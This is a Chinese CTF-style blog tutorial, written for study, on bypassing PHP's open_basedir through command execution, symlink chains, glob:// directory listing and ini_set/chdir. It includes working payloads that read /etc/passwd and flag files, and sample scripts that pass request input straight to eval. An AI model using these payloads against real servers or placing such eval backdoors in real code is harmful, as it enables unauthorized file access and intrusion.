绕过 open_basedir

已于 2023-08-11 19:06:49 修改
阅读量957 收藏 3
点赞数 1
分类专栏: WEB 文章标签: php
于 2023-08-11 10:36:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/132140858
版权

目录

0x01 首先了解什么是 open_basedir

 0x02 通过命令执行绕过

0x03 通过symlink 绕过 (软连接)

0x04利用glob://绕过

方式1——DirectoryIterator+glob://

方式2——opendir()+readdir()+glob://

0x05  通过 ini_set和chdir来绕过

在ctfshow 72遇到的 open_basedir 所以进行学习

https://www.cnblogs.com/hookjoy/p/12846164.html#:~:text=%E5%8F%AA%E6%98%AF%E7%94%A8glob%3A,%E8%83%BD%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E3%80%82

 上面是师傅的文章

我就跟着复现一下

0x01 首先了解什么是 open_basedir

open_basedir是php.ini的设置

在open_basedir设置路径的话 那么网站访问的时候 无法访问除了设置以外的内容

 这里还有一个知识点

如果我们设置 open_basedir=/var/www/html

那我们只能访问

/var/www/html/index.php
/var/www/html/images/logo.png
/var/www/html/includes/config.php


不能访问

/var/www/otherfile.php(不在指定目录之下)
/var/www/html2/index.php(不是以指定路径为前缀)


所以open_basedir并不是以目录名为 规定

而是路径

我创建了一个test文件夹 存放着 1.php

 

 那我设置open_basedir 指定 test

open_basedir =D:\phpstudy_pro\WWW\test

那我们看看能不能访问1.php

 发现是ok的

那我们去访问一下 www的 flag.php呢

 发现阻止了 并且我们无法访问其他目录 例如 sqli-labs

 0x02 通过命令执行绕过

open_basedir对命令执行没有限制

假如没有进行过滤 那我们就可以通过system函数直接执行

我的1.php代码是

<?php

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

?>

没有过滤 而且通过post方式

c=show_source(__FILE__);system('type D:\phpstudy_pro\WWW\flag.php');

 成功绕过了 open_basedir

这里是适用于 没有对命令进行过滤

但是一般都难以使用 会被disable_functions 禁用

0x03 通过symlink 绕过 (软连接)

软连接我们在 ciscn的unzip有见识到

就是linux的快捷方式

我们可以通过软连接;链接其他文件 然后对其进行访问

这里还需要介绍symlink()函数

symlink(链接的目标,链接的名称)

我们来尝试一下

<?php 
symlink("/root/.presage/","/root/桌面/exp");
?>

然后我们执行一下

php 2.php

发现真的生成了一个文件夹exp 并且就是指向了我们需要的目录

 这里我们开始复现师傅的内容

mkdir 
创建文件夹


chdir
切换到某文件夹的工作区间

 

 假如我们在/var/www/html/的3.php处

<?php
mkdir("A");
chdir("A");
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
?>

执行

发现现在的路径变为了/var/www/html/A/B/C/D/

这个时候 我们已经进入了 D目录

我们需要退回 html界面就通过 ..即可

<?php
mkdir("A");
chdir("A");
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
?>

这个时候 就处于 var/www/html目录下

然后我们通过软连接链接 abcd

<?php
mkdir("A");
chdir("A");
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("A/B/C/D","7abc");
?>

 这个时候 我们再建立

symlink("7abc/../../../../etc/passwd","exp");

的链接

但是这个我们是无法建立的 因为不存在这种软连接

但是我们只需要 删除 7abc的软连接 然后创建一个 7abc的文件夹

那么这样 就是

目录的7abc/../../../etc/passwd

这样就不会访问快捷方式的 而是当前目录的 然后访问exp

 发现就是passwd里的内容了

 这样我们就打破了 open_basedir的限制 访问了其他目录的内容

<?php
mkdir("A");
chdir("A");
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("A/B/C/D","7abc");
symlink("7abc/../../../../etc/passwd","exp");
unlink("7abc");
mkdir("7abc");
?>

这里payload的重点就是

我们想要跨越多少层

就需要建立多少层的 目录


然后通过软连接

删除 生成文件夹 

然后就可以通过当前文件夹 链接到该去的地方

0x04利用glob://绕过

照常 首先看看什么是 glob://协议

glob://协议 就是查找文件路径的模式

是从 5.3开始使用的协议

利用师傅的 内容进行修改

<?php
$it = new DirectoryIterator("glob:///var/www/html/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
%s:字符串
%.1F 一位小数
%K 单位

}
?>

打印一下 var/www/html的内容

发现生效了

 但是如果只是单用 glob://无法绕过的

所以我们需要结合其他函数

方式1——DirectoryIterator+glob://

DirectoryIterator
就是一个接口 用户可以简单轻松的查看目录
<?php
$c=$_GET[c];
$a=new DirectoryIterator($c);
foreach($a as $f){
    echo($f->__toString().'<br>');
}
?>

然后我们输入 glob:///* 就可以列出根目录

但是 使用这个方法只能访问根目录和open_basedir受限的目录

所以对于 ctfshow web72 也可以使用这个方法访问根目录

c=?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    echo($f->__toString().'<br>');
}exit();
?>

 得到了flag的地址

回到这里

那我们就应该使用另一个方法

方式2——opendir()+readdir()+glob://

opendir()打开目录句柄

readdir() 读取目录
<?php
$a = $_GET['c'];
if ( $b = opendir($a) ) {
    while ( ($file = readdir($b)) !== false ) {
        echo $file."<br>";
    }
    closedir($b);
}
?>

这里对于web72也可以使用

c=?><?php if ( $b = opendir("glob:///*") ) {while ( ($file = readdir($b)) !== false ) { echo $file."<br>";}closedir($b);}exit();

 

 效果和 DirectoryIterator一样

只能根目录和限定目录

0x05  通过 ini_set和chdir来绕过

<?php
echo 'open_basedir: '.ini_get('open_basedir').'<br>';
echo 'GET: '.$_GET['c'].'<br>';
eval($_GET['c']);
echo 'open_basedir: '.ini_get('open_basedir');
?>

通过相对路径

mkdir('mi1k7ea');chdir('mi1k7ea');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo file_get_contents('/etc/passwd');

首先我们创建一个可以上下跳的目录

/var/www/html

创建 mi1k7ea 

/var/www/html/mi1k7ea

切换到当前目录 通过 chdir

然后ini_set 设置 open_basedir为 ..

那么这个时候 php.ini里的内容就为 ..
那我们进行切换工作目录

chdir .. 返回上一个目录 即/var/www/html

通过 open_basedir的比对 符合.. 那么就可以访问

我们再来一次/var/www

/var

/
最后到/ 了 但是我们无法通过 / 去访问 因为 / != ..

这个时候 我们再来一次 ini_set  设置为 / 

这个时候 我们就可以访问 / 下的任何内容了


这里有一个需要注意

如果我们的php文件在根目录

即/var/www/html/

那么就需要创建一个 目录来进行设置
即

mkdir("123");chdir("123");ini_set("open_basedir","..");



如果我们不在根目录 
即/var/www/html/test/

并且open_basedir为 /var/www/html/

那么我们就不需要再创建一个目录来设置

直接在test上操作即可

即 ini_set("open_basedir","..");chdir("..");

到此 差不多就结束了

双层小牛堡
关注
专栏目录
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5471
简单绕过open_basedir 的几种方法
『CTF Tricks』PHP-绕过open_basedir
Ho1aAs‘s Blog
09-10 2206
读取目录:DirectoryIterator类 + glob://协议;FilesystemIterator类 + glob://协议;读取文件:ini_set() + 相对路径;shell命令执行;symlink();
绕过open_basedir
unexpectedthing的博客
07-02 1588
open_basedir绕过
学习周报之open_basedir绕过
clearloveQAQ的博客
05-01 825
一: CTFSHOW805: 看到这个地方没有过滤信息就直接试了一下1=system(‘ls’);去读目录但是发现没反应就去看了一下phpinfo发现它是ban了很多函数然后open_basedir也开了所以这题就是要我们绕过open_basedir的题目,这类题在ctfshow命令执行的题中有出现过,就是通过glob协议进行目录读取,但是我忘了所以又重新学了一下glob协议的用法 glob伪协议 1=$a="glob:///*"; if($b=opendir($a)){ w..
15_open_basedir绕过
最新发布
qq_45301512的博客
02-01 640
将两次结果对比,可以理解open_basedir的作用就是限制访问如果设立在test目录下,那么就只能访问test目录下面的目录或者文件,其它目录下面的内容都无法访问如果不设立open_basedir,任何目录下的内容都可以访问。
-------已搬运------绕过 open_basedir学习
Zero_Adam的博客
05-04 500
参考自:open_basedir绕过 环境设置: shell.php: 利用symlink()绕过 symlink()函数 symlink()对于已有的target建立一个名为link的符号连接。 用法如下: symlink (string [Math Processing Error] link) symlink()对于已有的 target(一般情况下受限于open_basedir)建立一个名为link的符号连接。 成功时返回TRUE, 或者在失败时返回FALSE。 示例用法如下: <?p
PHP绕过open_basedir限制操作文件的方法
12-20
符号链接(又称软链接)在绕过`open_basedir`限制时扮演了关键角色。符号链接是一种特殊文件,包含另一个文件或目录的路径,可以链接到不同文件系统。在读取或写入符号链接时,系统会自动转到源文件。但是,删除符号...
PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍
10-24
主要介绍了PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍,这个漏洞很久之前(大概5年前)被提出来了,到现在的最新版本中依然存在,需要的朋友可以参考下
php文件包含目录配置open_basedir的使用与性能详解
12-20
- 在PHP代码中使用`ini_set('open_basedir', '指定目录')`,但这样做通常不推荐,因为它可能被恶意用户通过代码注入绕过。 - 在Apache的`httpd.conf`中,对`Directory`区块使用`php_admin_value open_basedir ...
PHP之如何绕过open_basedir
shy的博客
11-27 1448
open_basedir php.ini中原文的说明是: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *N...
php open_basedir绕过,PHP 'open_basedir'安全限制绕过漏洞
weixin_42659196的博客
03-16 155
发布日期:2012-07-20更新日期:2012-07-23受影响系统:PHP PHP 5.3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 54612CVE ID: CVE-2012-3365PHP 是一种 HTML 内嵌式的语言,PHP与微软的AS...
php open_basedir绕过,PHP绕过open_basedir列目录的研究
weixin_34236572的博客
03-16 1055
首发drops:http://drops.wooyun.org/tips/3978 。 近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHPopen_basedir绕过并列举目录的方法总结。 0x0首发drops:http://drops.wooyun.org/tips/3978 。近...
PHP绕过open_basedir列目录的研究
weixin_33810302的博客
03-08 824
phith0n · 2014/11/21 16:050x00 前言近期由于在开发自己的webshell,所以对PHP一些已有的漏洞进行了一定的研究,并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享一下自己对于PHPopen_basedir绕过并列举目录的方法总结。0x01 open_basedir的简介Open_basedirPHP设置中为了防御PHP跨目录进行文件(目录)读写...
php5全版本绕过open_basedir读文件脚本 -- phith0n
收集盒 Book box
12-11 1230
漏洞很久之前(大概5年前)被提出来了,但并不是php代码上的问题,所以问题一直存在,直到现在。我一直没留意,后来yaseng告诉我的,他测试了好像5.5都可以。 他在评论里发过了:http://zone.wooyun.org/content/17131,漏洞详情在这里http://cxsecurity.com/issue/WLB-2009110068。 给出我写的EXP: <?php h
PHP绕过open_basedir
灰太的表格的博客
09-05 265
1. 命令执行函数 open_basedir的设置对系统命令执行函数无效 <?php $cmd="cat ../1.txt"; file_get_contents($cmd); echo"file_get_contents finsh"."\n"."-----------------------"."\n"; system($cmd); echo shell_exec($cmd); echo exec($cmd)."\n"; passthru($cmd); $fp = popen($
[SUCTF 2019]EasyWeb hao .htacess绕过 open_basedir绕过
Je3Z的博客
08-02 544
很好的一个题考了很多知识点 rce异或绕过 .htacess绕过 open_basedir绕过 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir);
php文件包含目录配置open_basedir的使用与性能分析
热门推荐
傲雪星枫
01-15 4万+
本文将介绍php文件包含目录配置open_basedir的使用方法,并对使用了open_basedir之后的服务器性能进行分析,分析使用后的利与弊。
php open_basedir设置以及关于安全
ecshop数据采集发布接口,zencart,lightinthebox,shopex 采集,快客
10-17 920
#!/usr/bin/k4shifz 看了军神blog,回来研究的。 open_basedir可将用户访问文件的活动范围限制在指定的区域,通常是其家目录的路径,也可用符号"."来代表当前目录。注意用open_basedir指定的限制实际上是前缀,而不是目录名。 举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/ot
12.23 open_basedir
weixin_34050427的博客
01-09 101
2019独角兽企业重金招聘Python工程师标准>>> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值